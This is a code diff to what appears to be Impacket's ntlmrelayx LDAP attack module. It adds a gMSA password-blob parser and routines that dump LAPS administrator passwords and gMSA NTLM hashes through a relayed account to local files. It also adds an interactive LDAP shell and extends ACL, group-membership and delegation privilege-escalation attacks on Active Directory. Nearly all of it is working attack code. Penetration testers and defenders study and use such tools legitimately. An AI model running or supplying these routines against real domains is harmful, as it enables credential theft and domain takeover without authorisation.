@@ -15,25 +15,30 @@
 #
 # ToDo:
 #
+import _thread
 import random
 import string
-import thread
 import json
 import datetime
 import binascii
 import codecs
 import re
-import ldapdomaindump
 import ldap3
-from impacket import LOG
-from impacket.examples.ntlmrelayx.attacks import ProtocolAttack
-from impacket.ldap import ldaptypes
-from impacket.uuid import string_to_bin, bin_to_string
-from impacket.ldap.ldaptypes import ACCESS_ALLOWED_OBJECT_ACE, ACCESS_MASK, ACCESS_ALLOWED_ACE, ACE, OBJECTTYPE_GUID_MAP
-from pyasn1.type.namedtype import NamedTypes, NamedType
-from pyasn1.type.univ import Sequence, Integer
-from ldap3.utils.conv import escape_filter_chars
+import ldapdomaindump
 from ldap3.core.results import RESULT_UNWILLING_TO_PERFORM
+from ldap3.utils.conv import escape_filter_chars
+import os
+from Cryptodome.Hash import MD4
+
+from impacket import LOG
+from impacket.examples.ldap_shell import LdapShell
+from impacket.examples.ntlmrelayx.attacks import ProtocolAttack
+from impacket.examples.ntlmrelayx.utils.tcpshell import TcpShell
+from impacket.ldap import ldaptypes
+from impacket.ldap.ldaptypes import ACCESS_ALLOWED_OBJECT_ACE, ACCESS_MASK, ACCESS_ALLOWED_ACE, ACE, OBJECTTYPE_GUID_MAP
+from impacket.uuid import string_to_bin, bin_to_string
+from impacket.structure import Structure, hexdump
+
 # This is new from ldap3 v2.5
 try:
     from ldap3.protocol.microsoft import security_descriptor_control
@@ -49,6 +54,43 @@ dumpedDomain = False
 alreadyEscalated = False
 alreadyAddedComputer = False
 delegatePerformed = []
+
+#gMSA structure
+class MSDS_MANAGEDPASSWORD_BLOB(Structure):
+    structure = (
+        ('Version','<H'),
+        ('Reserved','<H'),
+        ('Length','<L'),
+        ('CurrentPasswordOffset','<H'),
+        ('PreviousPasswordOffset','<H'),
+        ('QueryPasswordIntervalOffset','<H'),
+        ('UnchangedPasswordIntervalOffset','<H'),
+        ('CurrentPassword',':'),
+        ('PreviousPassword',':'),
+        #('AlignmentPadding',':'),
+        ('QueryPasswordInterval',':'),
+        ('UnchangedPasswordInterval',':'),
+    )
+
+    def __init__(self, data = None):
+        Structure.__init__(self, data = data)
+
+    def fromString(self, data):
+        Structure.fromString(self,data)
+
+        if self['PreviousPasswordOffset'] == 0:
+            endData = self['QueryPasswordIntervalOffset']
+        else:
+            endData = self['PreviousPasswordOffset']
+
+        self['CurrentPassword'] = self.rawData[self['CurrentPasswordOffset']:][:endData - self['CurrentPasswordOffset']]
+        if self['PreviousPasswordOffset'] != 0:
+            self['PreviousPassword'] = self.rawData[self['PreviousPasswordOffset']:][:self['QueryPasswordIntervalOffset']-self['PreviousPasswordOffset']]
+
+        self['QueryPasswordInterval'] = self.rawData[self['QueryPasswordIntervalOffset']:][:self['UnchangedPasswordIntervalOffset']-self['QueryPasswordIntervalOffset']]
+        self['UnchangedPasswordInterval'] = self.rawData[self['UnchangedPasswordIntervalOffset']:]
+
+
 class LDAPAttack(ProtocolAttack):
     """
     This is the default LDAP attack. It checks the privileges of the relayed account
@@ -67,7 +109,11 @@ class LDAPAttack(ProtocolAttack):
     GENERIC_ALL             = 0x000F01FF
 
     def __init__(self, config, LDAPClient, username):
+        self.computerName = '' if config.addcomputer == 'Rand' else config.addcomputer
         ProtocolAttack.__init__(self, config, LDAPClient, username)
+        if self.config.interactive:
+            # Launch locally listening interactive shell.
+            self.tcp_shell = TcpShell()
 
     def addComputer(self, parent, domainDumper):
         """
@@ -86,8 +132,13 @@ class LDAPAttack(ProtocolAttack):
         domaindn = domainDumper.root
         domain = re.sub(',DC=', '.', domaindn[domaindn.find('DC='):], flags=re.I)[3:]
 
-        # Random computername
-        newComputer = (''.join(random.choice(string.ascii_letters) for _ in range(8)) + '$').upper()
+        computerName = self.computerName
+        if not computerName:
+            # Random computername
+            newComputer = (''.join(random.choice(string.ascii_letters) for _ in range(8)) + '$').upper()
+        else:
+            newComputer = computerName if computerName.endswith('$') else computerName + '$'
+
         computerHostname = newComputer[:-1]
         newComputerDn = ('CN=%s,%s' % (computerHostname, parent)).encode('utf-8')
 
@@ -177,11 +228,11 @@ class LDAPAttack(ProtocolAttack):
             LOG.info('Adding user: %s to group %s result: OK' % (userName, groupName))
             LOG.info('Privilege escalation succesful, shutting down...')
             alreadyEscalated = True
-            thread.interrupt_main()
+            _thread.interrupt_main()
         else:
             LOG.error('Failed to add user to %s group: %s' % (groupName, str(self.client.result)))
 
-    def delegateAttack(self, usersam, targetsam, domainDumper):
+    def delegateAttack(self, usersam, targetsam, domainDumper, sid):
         global delegatePerformed
         if targetsam in delegatePerformed:
             LOG.info('Delegate attack already performed for this computer, skipping')
@@ -191,12 +242,15 @@ class LDAPAttack(ProtocolAttack):
             usersam = self.addComputer('CN=Computers,%s' % domainDumper.root, domainDumper)
             self.config.escalateuser = usersam
 
-        # Get escalate user sid
-        result = self.getUserInfo(domainDumper, usersam)
-        if not result:
-            LOG.error('User to escalate does not exist!')
-            return
-        escalate_sid = str(result[1])
+        if not sid:
+            # Get escalate user sid
+            result = self.getUserInfo(domainDumper, usersam)
+            if not result:
+                LOG.error('User to escalate does not exist!')
+                return
+            escalate_sid = str(result[1])
+        else:
+            escalate_sid = usersam
 
         # Get target computer DN
         result = self.getUserInfo(domainDumper, targetsam)
@@ -356,7 +410,7 @@ class LDAPAttack(ProtocolAttack):
         ]
         privs['escalateViaGroup'] = False
         for group in interestingGroups:
-            self.client.search(domainDumper.root, '(objectSid=%s)' % group, attributes=['nTSecurityDescriptor', 'objectClass'])
+            self.client.search(domainDumper.root, '(objectSid=%s)' % group, attributes=['nTSecurityDescriptor', 'objectClass'], controls=controls)
             groupdata = self.client.response
             self.checkSecurityDescriptors(groupdata, privs, membersids, sidmapping, domainDumper)
             if privs['escalateViaGroup']:
@@ -389,6 +443,7 @@ class LDAPAttack(ProtocolAttack):
                 sdData = entry['raw_attributes']['nTSecurityDescriptor'][0]
             except IndexError:
                 # We don't have the privileges to read this security descriptor
+                LOG.debug('Access to security descriptor was denied for DN %s', dn)
                 continue
             hasFullControl = False
             secDesc = ldaptypes.SR_SECURITY_DESCRIPTOR()
@@ -405,7 +460,8 @@ class LDAPAttack(ProtocolAttack):
                 if not ace.hasFlag(ACE.INHERITED_ACE) and ace.hasFlag(ACE.INHERIT_ONLY_ACE):
                     # ACE is set on this object, but only inherited, so not applicable to us
                     continue
-                # Check if the ACE has restrictions on object type
+
+                # Check if the ACE has restrictions on object type (inherited case)
                 if ace['AceType'] == ACCESS_ALLOWED_OBJECT_ACE.ACE_TYPE \
                     and ace.hasFlag(ACE.INHERITED_ACE) \
                     and ace['Ace'].hasFlag(ACCESS_ALLOWED_OBJECT_ACE.ACE_INHERITED_OBJECT_TYPE_PRESENT):
@@ -437,21 +493,27 @@ class LDAPAttack(ProtocolAttack):
                         else:
                             # Could be a different OU where we have access
                             # store it until we find a better place
-                            if privs['createIn'] != 'CN=Users,%s' % domainDumper.root and 'organizationalUnit' in entry['raw_attributes']['objectClass']:
+                            if privs['createIn'] != 'CN=Users,%s' % domainDumper.root and b'organizationalUnit' in entry['raw_attributes']['objectClass']:
                                 privs['create'] = True
                                 privs['createIn'] = dn
                     if can_add_member(ace) or hasFullControl:
-                        if 'group' in entry['raw_attributes']['objectClass']:
+                        if b'group' in entry['raw_attributes']['objectClass']:
                             # We can add members to a group
                             if not hasFullControl:
                                 LOG.debug('Permission found: Add member to %s; Reason: Granted to %s' % (dn, sidmapping[sid]))
                             privs['escalateViaGroup'] = True
                             privs['escalateGroup'] = dn
                     if ace['Ace']['Mask'].hasPriv(ACCESS_MASK.WRITE_DACL) or hasFullControl:
+                        # Check if the ACE is an OBJECT ACE, if so the WRITE_DACL is applied to
+                        # a property, which is both weird and useless, so we skip it
+                        if ace['AceType'] == ACCESS_ALLOWED_OBJECT_ACE.ACE_TYPE \
+                            and ace['Ace'].hasFlag(ACCESS_ALLOWED_OBJECT_ACE.ACE_OBJECT_TYPE_PRESENT):
+                            # LOG.debug('Skipping WRITE_DACL since it has an ObjectType set')
+                            continue
                         if not hasFullControl:
                             LOG.debug('Permission found: Write Dacl of %s; Reason: Granted to %s' % (dn, sidmapping[sid]))
                         # We can modify the domain Dacl
-                        if 'domain' in entry['raw_attributes']['objectClass']:
+                        if b'domain' in entry['raw_attributes']['objectClass']:
                             privs['aclEscalate'] = True
                             privs['aclEscalateIn'] = dn
 
@@ -485,6 +547,15 @@ class LDAPAttack(ProtocolAttack):
         # Create new dumper object
         domainDumper = ldapdomaindump.domainDumper(self.client.server, self.client, domainDumpConfig)
 
+        if self.config.interactive:
+            if self.tcp_shell is not None:
+                LOG.info('Started interactive Ldap shell via TCP on 127.0.0.1:%d' % self.tcp_shell.port)
+                # Start listening and launch interactive shell.
+                self.tcp_shell.listen()
+                ldap_shell = LdapShell(self.tcp_shell, domainDumper, self.client)
+                ldap_shell.cmdloop()
+                return
+
         # If specified validate the user's privileges. This might take a while on large domains but will
         # identify the proper containers for escalating via the different techniques.
         if self.config.validateprivs:
@@ -502,7 +573,7 @@ class LDAPAttack(ProtocolAttack):
         # an existing user via ACL attacks.
         else:
             LOG.info('Assuming relayed user has privileges to escalate a user via ACL attack')
-            privs = {}
+            privs = dict()
             privs['create'] = False
             privs['aclEscalate'] = True
             privs['escalateViaGroup'] = False
@@ -515,21 +586,19 @@ class LDAPAttack(ProtocolAttack):
                 result = self.getUserInfo(domainDumper, self.config.escalateuser)
                 # Unless that account does not exist of course
                 if not result:
-                    LOG.error('Unable to escalate without a valid user, aborting.')
-                    return
-                userDn, userSid = result
-                # Perform the ACL attack
-                self.aclAttack(userDn, domainDumper)
-                return
+                    LOG.error('Unable to escalate without a valid user.')
+                else:
+                    userDn, userSid = result
+                    # Perform the ACL attack
+                    self.aclAttack(userDn, domainDumper)
             elif privs['create']:
                 # Create a nice shiny new user for the escalation
                 userDn = self.addUser(privs['createIn'], domainDumper)
                 if not userDn:
-                    LOG.error('Unable to escalate without a valid user, aborting.')
-                    return
+                    LOG.error('Unable to escalate without a valid user.')
                 # Perform the ACL attack
-                self.aclAttack(userDn, domainDumper)
-                return
+                else:
+                    self.aclAttack(userDn, domainDumper)
             else:
                 LOG.error('Cannot perform ACL escalation because we do not have create user '\
                     'privileges. Specify a user to assign privileges to with --escalate-user')
@@ -542,28 +611,99 @@ class LDAPAttack(ProtocolAttack):
                 result = self.getUserInfo(domainDumper, self.config.escalateuser)
                 # Unless that account does not exist of course
                 if not result:
-                    LOG.error('Unable to escalate without a valid user, aborting.')
-                    return
-                userDn, userSid = result
+                    LOG.error('Unable to escalate without a valid user.')
                 # Perform the Group attack
-                self.addUserToGroup(userDn, domainDumper, privs['escalateGroup'])
-                return
+                else:
+                    userDn, userSid = result
+                    self.addUserToGroup(userDn, domainDumper, privs['escalateGroup'])
+
             elif privs['create']:
                 # Create a nice shiny new user for the escalation
                 userDn = self.addUser(privs['createIn'], domainDumper)
                 if not userDn:
                     LOG.error('Unable to escalate without a valid user, aborting.')
-                    return
                 # Perform the Group attack
-                self.addUserToGroup(userDn, domainDumper, privs['escalateGroup'])
-                return
+                else:
+                    self.addUserToGroup(userDn, domainDumper, privs['escalateGroup'])
+
             else:
                 LOG.error('Cannot perform ACL escalation because we do not have create user '\
                           'privileges. Specify a user to assign privileges to with --escalate-user')
 
+        # Dump LAPS Passwords
+        if self.config.dumplaps:
+            LOG.info("Attempting to dump LAPS passwords")
+
+            success = self.client.search(domainDumper.root, '(&(objectCategory=computer))', search_scope=ldap3.SUBTREE, attributes=['DistinguishedName','ms-MCS-AdmPwd'])
+            
+            if success:
+
+                fd = None
+                filename = "laps-dump-" + self.username + "-" + str(random.randint(0, 99999))
+                count = 0
+
+                for entry in self.client.response:
+                    try:
+                        dn = "DN:" + entry['attributes']['distinguishedname']
+                        passwd = "Password:" + entry['attributes']['ms-MCS-AdmPwd']
+
+                        if fd is None:
+                            fd = open(filename, "a+")
+
+                        count += 1
+
+                        LOG.debug(dn)
+                        LOG.debug(passwd)
+
+                        fd.write(dn)
+                        fd.write("\n")
+                        fd.write(passwd)
+                        fd.write("\n")
+
+                    except:
+                        continue
+
+                if fd is None:
+                    LOG.info("The relayed user %s does not have permissions to read any LAPS passwords" % self.username)
+                else:
+                    LOG.info("Successfully dumped %d LAPS passwords through relayed account %s" % (count, self.username))
+                    fd.close()
+
+        #Dump gMSA Passwords
+        if self.config.dumpgmsa:
+            LOG.info("Attempting to dump gMSA passwords")
+            success = self.client.search(domainDumper.root, '(&(ObjectClass=msDS-GroupManagedServiceAccount))', search_scope=ldap3.SUBTREE, attributes=['sAMAccountName','msDS-ManagedPassword'])
+            if success:
+                fd = None
+                filename = "gmsa-dump-" + self.username + "-" + str(random.randint(0, 99999))
+                count = 0
+                for entry in self.client.response:
+                    try:
+                        sam = entry['attributes']['sAMAccountName']
+                        data = entry['attributes']['msDS-ManagedPassword']
+                        blob = MSDS_MANAGEDPASSWORD_BLOB()
+                        blob.fromString(data)
+                        hash = MD4.new ()
+                        hash.update (blob['CurrentPassword'][:-2])
+                        passwd = binascii.hexlify(hash.digest()).decode("utf-8")
+                        userpass = sam + ':::' + passwd
+                        LOG.info(userpass)
+                        count += 1
+                        if fd is None:
+                            fd = open(filename, "a+")
+                        fd.write(userpass)
+                        fd.write("\n")
+                    except:
+                        continue
+                if fd is None:
+                    LOG.info("The relayed user %s does not have permissions to read any gMSA passwords" % self.username)
+                else:
+                    LOG.info("Successfully dumped %d gMSA passwords through relayed account %s" % (count, self.username))
+                    fd.close()
+
         # Perform the Delegate attack if it is enabled and we relayed a computer account
         if self.config.delegateaccess and self.username[-1] == '$':
-            self.delegateAttack(self.config.escalateuser, self.username, domainDumper)
+            self.delegateAttack(self.config.escalateuser, self.username, domainDumper, self.config.sid)
             return
 
         # Add a new computer if that is requested
@@ -589,9 +729,10 @@ def create_object_ace(privguid, sid):
     acedata['Mask'] = ldaptypes.ACCESS_MASK()
     acedata['Mask']['Mask'] = ldaptypes.ACCESS_ALLOWED_OBJECT_ACE.ADS_RIGHT_DS_CONTROL_ACCESS
     acedata['ObjectType'] = string_to_bin(privguid)
-    acedata['InheritedObjectType'] = ''
+    acedata['InheritedObjectType'] = b''
     acedata['Sid'] = ldaptypes.LDAP_SID()
     acedata['Sid'].fromCanonical(sid)
+    assert sid == acedata['Sid'].formatCanonical()
     acedata['Flags'] = ldaptypes.ACCESS_ALLOWED_OBJECT_ACE.ACE_OBJECT_TYPE_PRESENT
     nace['Ace'] = acedata
     return nace
@@ -630,7 +771,7 @@ def create_empty_sd():
 # Check if an ACE allows for creation of users
 def can_create_users(ace):
     createprivs = ace['Ace']['Mask'].hasPriv(ACCESS_ALLOWED_OBJECT_ACE.ADS_RIGHT_DS_CREATE_CHILD)
-    if ace['AceType'] != ACCESS_ALLOWED_OBJECT_ACE.ACE_TYPE or ace['Ace']['ObjectType'] == '':
+    if ace['AceType'] != ACCESS_ALLOWED_OBJECT_ACE.ACE_TYPE or ace['Ace']['ObjectType'] == b'':
         return False
     userprivs = bin_to_string(ace['Ace']['ObjectType']).lower() == 'bf967aba-0de6-11d0-a285-00aa003049e2'
     return createprivs and userprivs
@@ -638,7 +779,7 @@ def can_create_users(ace):
 # Check if an ACE allows for adding members
 def can_add_member(ace):
     writeprivs = ace['Ace']['Mask'].hasPriv(ACCESS_ALLOWED_OBJECT_ACE.ADS_RIGHT_DS_WRITE_PROP)
-    if ace['AceType'] != ACCESS_ALLOWED_OBJECT_ACE.ACE_TYPE or ace['Ace']['ObjectType'] == '':
+    if ace['AceType'] != ACCESS_ALLOWED_OBJECT_ACE.ACE_TYPE or ace['Ace']['ObjectType'] == b'':
         return writeprivs
     userprivs = bin_to_string(ace['Ace']['ObjectType']).lower() == 'bf9679c0-0de6-11d0-a285-00aa003049e2'
     return writeprivs and userprivs
